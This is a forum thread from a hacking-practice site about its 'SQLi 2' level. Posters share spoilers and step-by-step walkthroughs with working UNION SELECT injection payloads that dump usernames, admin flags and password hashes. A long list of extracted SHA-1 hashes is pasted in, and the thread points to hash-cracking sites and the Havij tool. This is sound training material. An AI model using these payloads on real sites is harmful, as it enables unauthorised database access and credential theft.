SQL2 Hints

SQLi 2

BitSec01
11 years ago

3

If you want to figure it out by yourself dont click on the spoiler!!

Oke i think you have already figure out that you have to click on members and then on a letter doesnt matter wich one. then make the url so you can infect it a'
then you want the get the username and the password from a table. find out what the table is called its easy. Members
if you have figure it out then were do you want the information from so type From Table_Name– behind your url
now it looks something like testsite.com/Browse&q=a' UNION ALL SELECT 1,2 FROM Table_Name–

you wil get much 1 only so check out wich one is an admin so go to your url and type instead of
testsite.com/Browse&q=a' UNION ALL SELECT 1,2 FROM Table_Name–
type this
testsite.com/Browse&q=a' UNION ALL SELECT what information do you want,2 FROM Table_Name–

some tips:
password . username . sha1 1=admin = 000000000000000000000000000001[/spoiler]

Admin spoiler..
[spoiler]If this gives the answer away. please delete it..

89replies
31voices
2,702views
4images
J [ColdIV]
11 years ago

3

Mh.. You could at least explain a bit more I guess
Seems like just giving away part of the solution without explaining a lot
Like for example you could explain why they would select 1,2.

I don’t think it’s a too big hint but I think there could be some more explanation :)
The goal is to learn something and most of them would probably just copy paste some parts of it so better explain more and write less of the code.
Anyway, nice one d:

Wibben
11 years ago

1

And also, maybe tell them that in real life, they may have to do trial and error to find the number of columns, instead of just giving it to them?

BitSec01
11 years ago

1

nah if they dont know how to find numbers of collumns they have to search it on google.

and Wibben you know this are SQL level 2 hints not Hint for real life hacking.

[deleted user]
11 years ago

1

SkyRamon - I think what Wibben was trying to say is that it is the same in the real world as here in a lot of ways, afterall that is what this site is all about, getting you to think in the real world and not just here!

MrProHacker
11 years ago

1

btw does anyone know how to hack network get password

Wibben
11 years ago

1

try this. I didn’t watch the whole thing but I think it should help

James Singh [cpn1000]
11 years ago

1

I need help on this level.

[deleted user]
11 years ago

1

Hey Wibben that link is crap. The video is set to private so no-one can watch it. :(

Wibben
11 years ago

0

awww… didn’t check. Personally i don’t know how, and cpn, I think there is a tutorial somewhere. Here, I actually finished the level off of this, it’s just don’t do exactly as the tutorial tells you to, there are some differences.

[deleted user]
11 years ago | edited 11 years ago

1

How I got the SQL2 level and just in case it is too much of a spoiler I will hide it. So if you don’t want or need help DON’T LOOK! :)

Started here: http://www.hackthis.co.uk/levels/s2.php?browse$q=anything' union all select username,2 from members–

What do I get from this? Nothing. So let’s try again.

http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' order by 3–

and got:
DEBUG: SELECT username, admin FROM members WHERE username LIKE ‘anything’ order by 3–%‘
ORDER BY column number 3 out of range - should be between 1 and 2

I know by this that my query is out of range and it needs to be between 1 and 2

Ok so next I tried: http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' order by 2–
But got No members found.

Next I tried: http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' order by 1–
But got No members found again then I rememberd.. idiot I forgot to use UNION SELECT.

So next I tried: http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' UNION SELECT username, admin FROM members WHERE username=‘qwert’ AND password=‘’ OR admin = ‘0’ LIMIT 2; –
got: Hil
Aman
Could these be the admin usernames?
I don’t think so. Where am I going wrong??

Well for a start I used a 0 which should have been 1 because the admin would be a 1
http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' UNION SELECT
what else? well we need to find the username of the admin from the members list
and the password would equal ‘ OR admin = '1’ or something like that but I need to set the limit to 2

So I tried:UNION SELECT username, admin FROM members WHERE username=‘qwert’ AND password=‘’ OR admin = ‘1’ LIMIT 2; –

this gave me a name could this be the admin username? maybe!!

Next I tried: UNION ALL SELECT 1,2 from members–
But this Just gave me a load of 1’s

So I mod'ed it to : UNION ALL SELECT username,2 from members–
and got all the usernames and the one I found before was at the bottom.

So changed things again a little and with: UNION ALL SELECT admin,2 from members–
That gave me all zeros except the last one which was a 1 so now I looked at the list of users again and the last one made me 100% sure that was the admin.

Now to try and find the password….. Well I knew that the database was of members so all I had to change was the admin to password. So I tried this: UNION ALL SELECT password,2 from members–

That gave me a lot of Hashes: The last one must be the admin password and because of its length I knew it was a **** hash, so I used jkain and decrypted it and got the password.

I typed in the username I got and the password and passed the level.

I hope this helps and is not too much of a give away. If it is I’m sure it will be deleted and my wrist slapped!! :)

James Singh [cpn1000]
11 years ago

1

Is there another way to decrypt it?

Wibben
11 years ago

1

Yeah ANONRA, you’re basically telling him the answer to the level… but then again, so am I. and cpn, there is only one way to crack the hash, and you should look around for a hash identifier.

James Singh [cpn1000]
11 years ago

1

I tried but I can’t find one!

Wibben
11 years ago

1

take a look at my profile, there is a note to self under my C++ code, it includes 3 encryption methods, and one of them is used by this level for the password.

James Singh [cpn1000]
11 years ago

1

DID YOU MEAN SHA-1???????????????
Image
“First day Internet kid.”

James Singh [cpn1000]
11 years ago

1

BTW NOT ME

Wibben
11 years ago

1

yes, congrats on finishing SQLi 2… hopefully

James Singh [cpn1000]
11 years ago

1

BUT I CANT FIND SOMETHING THAT DECRYPTES IT!!!!!!!!
(Can you guys even see the awesome pictures I post?)

Wibben
11 years ago

1

google SHA-1 decryptor, i found tons of then on google

James Singh [cpn1000]
11 years ago

1

I did!!!!!!!!!!!!!!
Which one did you use?

Wibben
11 years ago

1

here it is: LINK

James Singh [cpn1000]
11 years ago

1

THAT’S WHAT I USED!!!!
This is what I dectpted.

fa5678639492b3ad29bba2a809db8f0c8ad8fcaa
bc37be06d128a496d38b619dd59a23d7def4f8af
539170bffeb944a5b07d7adc6cb37d936fc14326
0de04c6c1bca90a1bf4ff23a6a3fe011b5e4b6c9
6868f1a0011dc236974f0d7ce15340c04d72853a
018518984faa152fe755500355b3a3d031411011
74f91a2614a7cfb937dfc58515106e18631ae249
9b8bdd782c3c41368dc86799adc5d63b28e8621c
7fc05bed1f9d84328241d680680ee9e4f0d0118e
038718015393fbdb52fc126b6bd7969d92ad862e
4202e22b2d04b3d02ec61ccf2a5b6fb71a43c3d9
d0e63b4550578540272af3722a98adf803e39848
b7545f00854b7c4230d8d22a1669aadc78590e0d
9b080a56a2e6b61808775b2a87ddde40f81e285e
6a6d892c2473cd439e919baf5d8c08bdcefb53be
d7625c4dcf8fa4574127c4430ffb7cbe63608aa4
d5d1fd2c44d8a9a32413d2c30516ed0405d8a5c9
9501ff46cb77401af31c2a8c695f37e6853cc8d2
5665ce8fc0eb503a3137e8be3bf44e60c3663265
b03e8b5d372332d60d435c7bbb9cfbd20d04db49
ec83ac3374046e2b934299684979a5239494cf91
2cc5e1b09918ab283e3acf9716d7213d32653fb6
987a0e2c66b024503c4f593a099b566349016901
87fee9a2bbd060b74a0078c0be9cc5c557ef42a9
4eb8487fafd8ecccc6cb6b9bd9c2cd81729958d6
fc6c93e498362fb2bf3e66bbc8bf747825e1af5f
1bb4e1affa7a5353e341b528fd684ea4c4b275f1
df3b6302b23c1ee1d4a56808510db62291a0bd22
084161d22f2f050043f40626d24a25167abf95bc
6a659ae0c30620afbd582258b712aedac553bbd7
6947f5554bd5e06a412ef7e89951975d4145414c
d75c12a6673271df204bac34b243b78344f95d11
c0918094f2a3dfd25238419ae1d76021b0ce1693
1b1d9944ec69969ab81ce4e4c62df8a4a931d6db
ec84765bfe9d31a834d75f5314135d97fcc43925
4aa4facc6414c976a5377b753eb0a6774993c376
04fc9b04ccaddcb91ae36a9628677ca3c1c0c838
9abff431fbf90a98b4a89be4e21807e348671d3d
226576aa041af9e2c44cea2dc0c5a38810cf2183
4ab7dae3b7daa6b10001447549898c1a5bab5e4a
773c087b0e9dc18aae0ec7f9297dd95cd4fb875e
e221a8f29f5374548a6458b83655684a99ee1f6d
ca616c90fa8b85722b8bd9116c3c3a35a3c6814b
b85cc1786fe6b155e65ffaedf57a0e8766417710
8f926a9ee18325959be1b71b7960b2d5db3effb6
2a8d03790c9d8a2650377165ebbb348d8cfb36af
5fbdbb0f91949c28aa3ba8e99553e5cda5c83d18
c6b50bea502a015ddba5b4b8ba759f091e55a096
1a802efa8b3cddae549120aa4f4a4f25f860c651
4d04a441b866255d61c848d3108b58dd61aed370
8bc70728429199f9c891c9e5febe10cbb04debd8
b99990b5d61ced94d2921ba515fdf7ce8ba586a3
b667baa77fb4941536e17509c9071d3bf42fc3d4
9d1b07e6adedcd3526d3447d376c11f922353f9f
85ec1dbaaaada4e3ca2a9578ece6a460f3097b66
102f7545a0d127f7686d8501ed768a1f07c1b289
cf30c903cf0b68779f88d86759750f0e059b993e
f475dfad966b523c6d319bf74361c27a7a244685
aab6957e45a811cd9058e0c713a69ca3bb9014b0
0fdc99cce9ad6eb5dcc6b734b3019d8f5536a384
e9165a8dd1fe83a2ab8b0e2122f04191bfc1fc43
92788fd263058f5ee7e04aaa7295f92c5981ce4d
c8f9f21ddda26bbc101639a722cebc91356e0b8d
240b1dd07a9425c020ddf5c9523bebac0b178f75
b2491e3487d223f75e85eb8002d378d1539a29fa
c629c1c31802ee6899125a0ecde24ebd22b81858
8f671ee548ae8f585bfde96a3d8ec4800fccd435
d00c89bc3ad37aebe0a5c520b5bb144ec00885a9
9e913b344b20c2f075e305e0f3172585ba23f37c
ba1d79b51a9295529e9e7a47dcf94f0a390defa2
6d8f2ec41761cfe5c263cb303aae30836aa5212d
efef7790b454c6dd195541efce8ff6dc3695c805
ad0aba78c7a012aed643b03446012ade01b7c04e
3a018e45837e452b3dfdbbf7c5d8818692cad5c3
669fb8c5a0e675f36126a9f0d236f7b29f920dad
b068c32bb3057d8be804076e8f82c86c8cb23bb9
e2b415a945c52dea5fc3c096495c1e9363be403b
b8b0c2451862ca167358a193c342bc73b973c462
2bd6cde7b4699bb8bff194870b0eedff85b1865b
67c24bd6e81f3ac4f8c784648e3b3f1fb05cc62b
4a1001b8330dda141dbe66b51c2cc91fbf94d6ce
4f7c11591f92437fb034238cc3d55d4714e731ac
22bade52e0c9a6a70efea73f9380f49ade0e2229
4d2abb782da6db8bcd2355cfe0b948087fd35f0a
662d4542b04a45af940c39dc969f188967545e98
276256648844cf9964ff3fdf3c39cb7fca479c5e
9480889a83180514dc5a78d84d1542a49607da9b
e4ba275184afeaf7cc831399a72b7733bcffff69
c21e19e6b8a9e2e416583e4160436b5872ef7768
6ef011fe8c625ce0a59da8ad0c9807936cc0e698
3b4cdf79415be4be253175c848bc37eb7cac614b
39097fd428f3786aa160924a21520e005acf1da3
3595fdc1a915fa8a6bdce332db523e287b474ecd
071736c29e894961fb8bc2b6ab670d2c0baf3c16
b7b6ec395a9b1b4fa781de5086115d28baa44c9e
61cb9288254003fb96d2e2a75cefd9f8d36872e1
eced03c4bbe5316a8a1ac2ec4359b6344880f97f
06a76087da00b2beffc68e9cc7299c2867850af0
8d3c92ad3eea192ff5df4afc95eb951427807b10
878209632b4f19f02ea7db7b2534d2520f0f71df
ce98d5df286c6d750871992a54fdc8e4f52a1de1
14ce126e05bbc03b27c71ff9d2e6ebc41d5a9bf5
34d084dba9741de90e4f5a0911a0ba95f8af4016
cc7ddb74c5873c03ea3d418e9692789af749e110
90a377b864f44c09b4588088305691986be00199
d0b66343e64542f8dc029bfc8ab8ad234e1414c6
aa91921e63e774e5af7a168716686e4a4fff9211
692d989d86e9c926f22fd034e07e79db74f7d413
36ab9b8a1bb2c50001e533b5701ff5d44b1729d2
ead3d7e56a4e705be83cac0b7d74cbd09dea0b4e
3314ab537aeab4dccddedda009fc9fd91b8f9b8e
f5a895fd9221b5cac1d517420de96a666f26b167
dc0a3f113955e2a588b8253dd283e59953a7f17c
22d873e0385d3ca673d5cf4f7e32e530d0fe4306
30ab8e0ecb6254b1bfed5ccb08b43618c64dd419
20bf7aea3a3b00a44fe5c61f3097243d79b4b115
5e873640a09475b0a0ddef07ebde6ec182a1175a
791676e27322929726628c4d1986573f46534082
2c67946c4c006255af0f3bd9f7fca13913baf04b
351fb2d4869c585eec3d22304fd244c8943157ac
1ceacef6abb72977057d77504db4a868899113af
cc4efdd8f712e7d2cb0a681159678f55224b4107
ca5334e407d1573fbc033fbc4fa4d4fc2e711f74
a381e39a0410f4f2b9b63065a420a0501734b550
8ccf218fe06dd5344573fbb7218764fa8ffcf33e
fcf8308fe379ec7910459ebe1fb214fae53434e4
dabbdd8bfde2f58332cf8ad0c8fd25d88d6eb06d
7e3ed38eff3e4fd491d37ecd1dadbc37a0c420d8
5bbff9f43898d5a8d87ddd942f69cd020fcb0b6b
86143d4744b91a08893cdf8384e98c3a4958cbbe
3ef9f8ff519c981d704a50b69eca2b6697dbf3ec
999eea2fbc75242345c3fbc6d251571be319eab4
15db294773edd5a9fda3681b04ebff79055d6320
357e96921f594454565142fd0032fb9b9a5d7382
812276d99166b2f6af22dd58ad9cf11d08e5e0e0
95b30b39fa91ca31aa8f611c15ee08fe3061cd22
fe78e66ee86325fca2c4e5bd8d279e7686c1393d
30c4a18bfa404eb99bde73ce6f5ed19ad53aa7cd
ac42445c949721c7aa71b4f579478b9c3a5fa678
7865d65b962a852c25ed41b639e93f9773a60948
82684b4cfb8346ea086ddfa9b0b54ad5c09a98bd
a972b33814f89c132798a979e9cef592596a461b
a4826765eb0d28a8b8d7cf50b1ac17db28a55e5a
953b7eb6fc8f1141ea4f1d5e09a8b3983717bdca
b53b97bfae178359c249005d6b86141802e9b854
8a25395f67114e18bb7fbb4181bdc7cf6d571bcc
1b3512022e2e469bc8badf0c6720ecdb20bac0ed
cfcacced3cc32f86a2a920585a810c0f7d4e7b38
4f6a7ff3db78044509b83ff825cfa6e00a6539cd
47a0d8ca8e7b2c4372683a4408fcfa52566fc8ce
dc3a7ae1ee6101636172e38c1c529c388e07d581
7d40db777a77c1ed67911bfbab5e8b3ca9e2d834
9f0491c2a029b43b5951dfed9f6c90fd1908ec23
096b943352085c72deab9473a0fb7e705dda9d98
9ee227d9217aa01871e9100a4b0461c639070b6f
3749cab5787fef6c7a2f93a120ebd6819896902f
add9466f6762a268da0c3d2c091e18ee323b0bfa
e348f7080019cc5a47d1958d8a7e786f3656352f
5ef5b7766573d3ced52cdaea9776bc9e25817e03
f1edde9a090ae484cf2d9e0c16597bb983b386af
12c845e3be4f243b311a9fe96ce6fed46d471e5c
0ddb47817daa2a675464e451d0e74d3be6418f8c
847ea6296ff739e21e84885a71752acaf071e623
2bf154795b3dfe1773f6e4017a00de550e847373
0524343e6c7e650b2d127c9b94e383ebbd75493c
d245eb69662a19c6bc618bd65b45f0eb9c75d459
14982414dd1c4cb65e45fbb315c0f1615d71df04
a7f1419f0bf32a4e1226a45aba7486b94407cdf5
fb56bc6ec4e4876bae42f8dcadc0f2642dac34e0
26e57ddefc205612160461dccabf6a4779d5fdd9
d8a6483dcc2e89606416a7770732fb72929ff785
db4bc8e6a60d1d523abe7d9c801bd9b089f1e9a8
2a19ceddaf1794d89fe158114f3c8e0117005a84
f06db1c0c4f30f899751fbb6d24a3e21b5a0e2f1
5658ebffca658716cea86a3dc9adceca47eda42f
cf60328fe196359c75d7ff8d4ff6d0876be542d2
67289272814b772bf6c019d2f62a49305e96551c
df29c762e238a59e6b4b5b7470c5079f5ffabf78
014c2cde350ab45f897d7bf999de7061b9093bed
50675d89fd3e40968666bdf8388ed3a79d1d83f0
2a3f038dd366b2d5d0086ab4132a952309582dec
159932e7b6855c12472c89a9afc52679344c6b14
de86db35bc7985ca8223308d242944513dd4f961
6664be0e23c90e6bf1ac0ec65e8753f95b5126f4
79b810f2c872940f06f37085ea14fa2818543eb7
e89d782f591174e029b3d26d8362c188729c4ff0
c545ba164c204ef7a22bcbc5b834bc3042b40943
e2c28ce5c9c8b4edf6290f3ff0669a97d116101f
d335887384d225b2767d44406137d0c3759c0061
f968f9faa4d0f141d0061ebdde63329d79938661
28769f090e4601042ba29df37ac6ce7127b03f0c
e12ff78d88fdf896763d258df87be86ed318db0f
3a2281b68cea035e49526299e09731352aecad57
eaf6d8cb33dcb0cc8667940bf1d518218f50cf36
477eeebd4937cf918c8295926122fe03f9a45e11
b8efd031e9fa3258fabc80cf3f0541173e7f857a
f1e77b1d219f0e523b868004cd68f87108762ae5
bdf142585985c7de312a637e0bad4d09c15df302
9bd21bddd5104523cce06721b4dcfb6d19e4262f
fa7f91a310ccc94ec41f8381e2d907bbd3ee5407
b146933d02b7df5084d7da599fe3382e0dcb02a4
104853108a4afa0d21115b16f4c45746967f2ef1
c0db16bec45a97b3667cd6eb5eeed7c4609b1938
d8614fa5faf4f0d9f7f5dfddf3ca2e8f5b88d821
536d71330647cb2670e468afbbd953639f23b81c
fe4325812157adca3e8747f0b2aff608052a3067
1681ac23c7767ec3b62eb07d2944a123c08bffcf
6f567166942cd12e1870000f19017a5c38f685be
6df4bc9a07dbb4b8a8484c5d945e20c3db17c280
1ae71eeced6174c545e5b9672378de9892d7ce25
9ba802bbbb762b778c77f4446f44f6e60d8e8d9d
acc5fde650499e67175904ec1782102b7dbff717
138a32e28198264e000925e171ddbb3b33544c78
538d2b66b01b1a7c26bcf877797bc1f780dc23a2
b5a8a494e08580973ed3d66697b7fa20f651ae1e
7a207937fb6df25cb0b599e4db4cd2d1cd0d2553
87dd736f2743dbd30ab705812aaa7a4c0584e578
7a4b88f8eead97539b02b0c865aaa316463b25be
5f26d001ee67f22b13b8de754fa89ae6288ec425
76a90cb36165132d74509a3eaf4c12d523b03695
48d8a855f82538a0b127eb3b0adf3ac82e849840
e0273f8bd302f9aaca4391aa3331bf58c70fde3f
87b2938cfb59ea1c48022c59cc8c61f640bc9f07
f0deacbe49863bd0d3a47f38c3f6e072fb0df8b7
ca01123eb67679bdd03e0d62c09c4466790bce18
40c6772e3b09d17d8e4c6f718c53b44c08592ea3
e06fb8547377dec58f6872e1e02f7716cf32ec02
c7e5987cb9ef31245068db983d90a96370e74dde
dabbb35e5b96814256e7a4f40588468a8c9302ae
1f3be6342f7d19a9d3a389aeb5c038ea8d861c13
c554e2a7dd41c7b8bcb26724670b06e9f55f36e6
c008affca0ef398299f24c6d7b5fed371a33b1a2
cef4e32e9ac71f8744a0648690e85dae84972ce5
2df6be2a3e0c5de196e476085caa96b7dcef05f3
eb05ceaac0163d3543f528a50471fe0724f2d7fc
48c8e313c5f4b2c0d2bad9a2a951df04816528f2
ec4fff2826406e5fc51efcd0f3c494c61c079272
3fca6cb1a9432c03207298b74ab2685fa94e0e5b
6921d001528bd7942c012fae3e5621bf3d38e441
efa4c98206cc3d5d9541640e1056e5ddbd91721a
3ee2f5c0fe3ade60af920c4081c7c5290a1fec9c
0e45ec538b742e0da4c6a50a39fa87a6091e2d92
dddeb73cf4b48302539e0cf86d7380fa00c68ae1
7dafcca059a36f9c7599a09bf90444437e990ed8
108373055bcad3eea3d0a6ee6d740633876c791c
f75490c9ef40eafd86df90912db3381235173926
eb05ea415f4077f2c68bfce912796e4dd6a1dc9b
d0aaddb90ca9d0a932aa1835f2df9fd9c8da407e
1b774bc166f3f8918e900fcef8752817bae76a37

Wibben
11 years ago

1

you know what you only need to crack one password right? and the password to crack corresponds to the username and admin

James Singh [cpn1000]
11 years ago

1

OK I’m lost.
What do I do?

Wibben
11 years ago

0

hmmm… look through the admin column, which one is the admin? then look through the username column, which one corresponds to the admin? Then look through the password column, which one corresponds with the username? Remember that MySQL stores things in a table, so the xth thing in one column corresponds with the xth thing in another

James Singh [cpn1000]
11 years ago

1

What column I went to this.

http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' UNION ALL SELECT password,2 from members–

Wibben
11 years ago

1

so why did you do that?

James Singh [cpn1000]
11 years ago

1

I thought it was the thing to decrypt…..
remember i went HERE

Wibben
11 years ago

1

why did you use http://www.hackthis.co.uk/levels/s2.php?browse&q=anything' UNION ALL SELECT password,2 from members–? What could be changed in that injection to yeild different results?

James Singh [cpn1000]
11 years ago

1

Image

Wibben
11 years ago

1

No, if I tell you you wouldn’t really learn, which would defeat the whole purpose of this level wouldn’t it?

James Singh [cpn1000]
11 years ago

1

“If you teach some one to learn be cheating, curiosity will get the best of them and they will be the smartest.”

Sorry couldn’t find the picture.

Wibben
11 years ago

1

okay fine, change “password” in the injection to the other column name(s)

James Singh [cpn1000]
11 years ago

1

what is the other column

Wibben
11 years ago

1

admin and username? That you should have thought of yourself, really…

James Singh [cpn1000]
11 years ago

1

Hey look at this!
Image
Image

Wibben
11 years ago

1

again? But it’s pretty funny, lol

J [ColdIV]
11 years ago

1

I don’t get you with your pictures.. maybe you should have read the posts above a bit more then searching for pictures. Like for example the post of ANONRA it pretty much explains everything and you wouldn’t have to ask the already answered questions.

DaGr8Kornolio
11 years ago

0

Hi everyone,

Not sure if I have to start a new thread… But I have question about explanation given on this page… I though I was OK with SQL query but I couldn’t figure this on my own (god I hate to surrender and come to the forum!!!).

First, I don’t have a clue why you use 1 and 2. What is that? These are real field in the table? I figured out easyly who the admin was just by adding it to the where statement… I tried the value ‘true’ and then I tried with 1 and it works… I tried to use the same trick as in SQL1 but of course it didn’t work!

I can explain why the admin field doesn’t appear in the result since it’s part of the original query. And I don’t understand either why the fields I set in the second select doesn’t show up. Password in particular!

And then…. How for the love of god are you able to see what encryption algorythm is used???

Sorry ANONRA… but even with all you efforts it’s not yet clear to me

I didn’t read all the posts and I hope I am not asking questions already answered….

DaGr8

Kabue
11 years ago

1

Well 1 and 2 is the first 2 columns. Where figured out that there is 2 columns iby using ‘order by’. Then you use the union all select to figure out which one of the columns that a vulnerable.

To figure out that the encryption is sha-1, you can use zerofreaks hash identifier, or you can just google it, or read about different hash types in Keepers tutorial, or just type it in www.goog.li
good luck :-). Not sure if I explained it correctly, or explained what you wanted to know. But this is how I understood it hehe ^_^
-Kabue

laaraj11
11 years ago

1

thank you for your help :)

James Singh [cpn1000]
11 years ago

1

I got it!!!!!!!!!!!! but wait how do you post pitures on your form sig.

J [ColdIV]
11 years ago

1

The same way you do it in your post. And I doubt that you haven’t trained that good enough..

James Singh [cpn1000]
11 years ago

1

ColdIV your just awesome.

teckgiik101
11 years ago

1

why don’t u guys use md5decrypter.co.uk

thatismypath
11 years ago

1

i did it thanks to ANONRA. thank you a lot

dlogical
11 years ago

1

SkyRamon i just wanted to say thanks for your post … it really helped alot :)

Spenca88
11 years ago

1

Hey Guys,

i got one question. I never had contact with sql before but i think i know what the queries do. So my question is how u know that there is a column including the password? The error-code says that …“SELECT username, admin FROM members WHERE username LIKE ‘anything’ order by 3–%‘ ORDER BY column number 3 out of range” so i thougt there have to be 2 columns….i didn’t thougt about change “1” to “password” to get the passwords shown…So how did u know about this password column?

Thanks a lot!

gudgip
11 years ago | edited 11 years ago

1

Guessing. Or using another method than order by.

–edit
Maybe an easier way to ‘guess’ is making some more profound guesses. And actually reading the error messages ;)

0xDC
11 years ago

1

The thing with simulated SQL injection missions is that - in this case - you can’t access the information_schema.tables and information_schema.columns (MySQL 5+ only). If this was possible, you could have checked all the columns in in the table.

Spenca88
11 years ago

1

Okay so in case i “couldn’t know” that there is a password column. Thanks for the fast answers!

Luke [flabbyrabbit]
11 years ago

1

@0xDC that isn’t technically right.. it is a complete database it just isn’t MySQL.

0xDC
11 years ago

2

@Spenca88: You couldn’t know, but a little guessing and digging always helps.

@flabbyrabbit: I was assuming (I know assumtion is the mother of all fuckups!) it was a MySQL dB and only meant that if it were MySQL 5+ it would be possible to read the information_schema. PS: Have you seen my notes regarding this mission?

Cheers,
0xDC

gudgip
11 years ago

1

Even if it’s another DBMS, they always have system tables. :-)

[deleted user]
10 years ago

1

I used to hate SQL, but now I love it. Visit www.w3schools.com and read the SQL tutorials, then you SHOULD be able to complete the level.

Abhi
10 years ago

1

Can someone help me out - I did reach the hashes but I can get them decrypted . I tried but….they aren’t getting decrypted.
Give me some pointers guys !!

Mystery [kapuccino]
10 years ago

1

@Abhi_hacker: Try some common encryption algorithms.

[deleted user]
10 years ago | edited 10 years ago

1

Abhi_hacker try this site to decrypt your hashes: http://md5decrypter.co.uk/ and are you sure the hash is correct??

Oh and like the deleted user said try reading these pages about SQL: SQL PAGES HERE

Abhi
10 years ago

1

Thank you kapuccino…..but I figured it out .
Tried it again and was able to crack it !! :)
Just tried it again and was able to do it !!
Thanks to you too ANONRA , for your help !!
Sqli is great…. guys….
Thoroughly enjoyed the sqli missions !! :) ;) :D

Abhi
10 years ago

1

I am genuinely sorry , if I troubled you guys !! :p

[deleted user]
10 years ago | edited 10 years ago

1

Hey Abhi_hacker you are no trouble at all - you’re welcome anytime okay? :)

P.S. SkyRamon is another one that hasn’t been on for two months. This wants closing too!

Abhi
10 years ago

1

Thanks for the kind reply ANONRA !! :)

KazeNodoka
10 years ago

1

Hi everybody

This one was quite difficult for a SQL newbi like me, but I finally complete it. Really interesting, indeed.

Honnesty, I think there’s too many information given without ‘show sploiler’ on this specific thread (Well, may be I shouldn’t say that, harder levels are coming soon :) ). It was really hard just to have a look and confirm I was on the right track to begin the level.

Btw, I tried 3 crackers on the web for the last step before finding the right one, so don’t panick if it doesn’t decypher with the first you find. Just try another one.

0xDC
10 years ago

1

Hi,

Use www.md5decryptor.co.uk to solve the “hash issue”.

Cheers,
0xDC


1

Well, as @KazeNodoka pointed out, this thread had enough hints and it should be closed.

poke @flabbyrabbit, poke @Osaka, poke @daMage

[deleted user]
10 years ago | edited 10 years ago

1

Hey Mechanon, you don’t really think they will take the trouble to checkout anything about a SQL Walkthrough? That would mean they would have to use a bit of the grey matter. Yes freewind, this should be closed. FFS how much help do some people want. Come on guys please use your brain, it’s the best tool you have. Well done Kazenodoka, good for you on completing the SQL Level 2. Not as hard as you thought eh? :)

** PLEASE SHUT THIS THREAD DOWN!**
Abhi
10 years ago

1

God , one more 7-paged thread . Close it down guys . You have got enough threads that you can clear the level just by reading all the threads in the forum .
Another important thing , kindly restrain from making new threads unless you have got some really different and genuine doubt about any level. There is no need to ask the same question in 3 different threads .
Admin please close this thread . It has become too big.

loadt4
10 years ago

1

sorry guys but i can’t understand where i should type all this stuff to find the usernames and passwords.. i have understood many things from SQL but not all and i don’t know how do i search

Mystery [kapuccino]
10 years ago | edited 10 years ago

1

@loadt4: You understood many things from SQL but never heard about SQL injection and where to exploit? What kind of sorcery is this? It is injection, right?

This thread should be closed because it is toooo long.

Abhi
10 years ago

1

@kapuccino , he has already completed sqli 2 . Don’t know how he did that , when he didn’t understand sql injection !!
Lets just not talk about it , cause it would be an useless and futile exercise !!
I hope @flabby closes this thread as it has become too long .

[IAmDevil]
10 years ago

1

Wow its really long!
Hey can this level done by using havij? I was researching about sqli and this seemed like an really usefull tool!

loadt4
10 years ago

1

Yeah i completed the level because i found out how to search. But i still don’t understand why we should use this: UNION ALL SELECT username,2 from members–
and NOT this: UNION ALL SELECT username from members–
What does the “2” do? What’s its function? Thanks

KazeNodoka
10 years ago

1

I think the main point is not what we ‘should’ do or not do. There is never a single solution to a problem. I didn’t use the above way to solve it. The important think is to find how it works, and find a solution (well sometimes, it’s the reverse order: find a solution and guess why it works :) ). For that, we got the most powerful tool : the Web. We should use it while it’s still free to surf on. Never wait to get a recipe : let’s think and find a solution.

[IAmDevil]
10 years ago

1

So this level can be done using havij. I’m gonna try it in a couple of days!

[deleted user]
10 years ago

1

@IAmDevil : Whats havij. Can it be used on Windows or only Linux.

Abhi
10 years ago

1

@tlotr : Havij is a ssoftware used in Windows to automate Sql injection in a given webpage !!

[deleted user]
10 years ago

1

@Abhi_hacker : You are up early and thanks for the above info. I will check it out as well. Thanks once again.

2 replies have been removed
qwerert
10 years ago

1

If there isn’t anything else to discuss, this thread should be closed.

[IAmDevil]
10 years ago | edited 10 years ago

1

Yes as @Abhi_hacker said its a software to remotely do sqli without all the typing or queries!
And @tlotr if you are gonna try using havij to complete Sqli2 let me know what you discover. Can’t do the level because i’m nowhere near a computer! ?

Reply has been removed
[deleted user]
10 years ago | edited 10 years ago

1

Hi guys, I already tried that Havij. I have the pro version and to be honest, I did the level quicker using my head than Havij took to do it. It is like all the software out there for n00bs to use but if you know your way round SQL you really don’t need it. In Havij Pro you can also use a MD5 Decrypter but guess how it works out the MD5 hash?? Give in? It goes to MD5 Decrypter to solve the hash. It also goes to some others too but mostly the hash is decrypted using MD5 Decrypter. Another point is; you won’t learn much using Havij, sometimes just the answers but if that makes you feel a better hacker, (by climbing on someone elses skills) then okay. But; and I always say this: Your brain is the best tool you will ever have, so use it. Happy Hackin' :)

Abhi
10 years ago

1

Yaa @Anonra , It was very easy to get it using Havij pro which I recently tried out…to be frank….today morning only !! But you know , I enjoyed the Sqli missions more when I did everything on my own !! And thats why I learnt too !! :)
It feels really rewarding when you clear the level after toiling hard(it took me 47 attempts to get it) and in that way you learn too !! :)

[deleted user]
10 years ago

1

Correct Abhi_hacker you hit the nail on the head - YOU LEARNED MORE DOING IT YOURSELF. My point exactly! :) :) :)

[IAmDevil]
10 years ago

1

Thank you guys for your replies! I too did it using the raw or manual method. It helps to understand what are you doing to complete the level rather than just doing some automated commands. But its true that using havij saves a lot of time. ?

Reply has been removed
Spoonisi
9 years ago | edited 9 years ago

1

This is a spoiler but theres been enough information on the thread to make what i say meaningless…. its just way simpler to understand

I see the answer has basically been posted , i just want to share my way of solving the level…

  1. I input the following query a' UNION ALL SELECT 1,2 FROM TheTablesName–
    And it returned information…
    Im looking for the user names and passwords so i changes it to a' UNION ALL SELECT usernames,2 FROM TheTablesName- to return all the members and also
    a' UNION ALL SELECT passwords,2 FROM TheTablesName- to return the passwords… so this basically gave me all the usernames and passwords…
    i needed to single out the admin account and so a' UNION ALL SELECT admin,2 FROM TheTablesName-

this gave me the place of the admins account…. cross referencing with the usernames and passwords i found the account i needed…. decrypted the password and boom level passed

spadehacker
9 years ago

1

I don’t understant in wich link do I have to inject. I tried on the level, inbox, forums, search and it never works. I get no error message when I chek if it’s vulnerable and when I inject the code it says level not found or page not found…

dloser
9 years ago

1

Try restricting yourself to the challenge, which is not hacking this site. You seem to be missing a very obvious place.

spadehacker
9 years ago

1

Thanks! I was looking on the wrong place but I found it now :)

Not_me
8 years ago | edited 8 years ago

1

Ummm, thank you for your contribution !

I’ve only looked at the first spoiler and I feel like it’s already too much

